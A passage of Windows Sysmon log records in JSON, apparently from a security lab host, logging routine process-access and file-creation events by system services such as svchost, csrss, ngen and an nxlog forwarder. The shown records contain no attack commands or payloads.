06:59:53.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E9-5F25-0000-0010F4460A00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:53.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:53.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:54.665\r\nProcessGuid: {E2A3D6B1-12E9-5F25-0000-0010F4460A00}\r\nProcessId: 2868\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b34-0\\System.Web.Services.dll\r\nCreationUtcTime: 2020-08-01 06:59:54.665","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:54.665","ProcessGuid":"{E2A3D6B1-12E9-5F25-0000-0010F4460A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b34-0\\System.Web.Services.dll","CreationUtcTime":"2020-08-01 06:59:54.665","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.728\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.728","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.728\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.728","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.743\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.743","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.790\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010B84E0A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.790","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010B84E0A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.790\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010B84E0A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 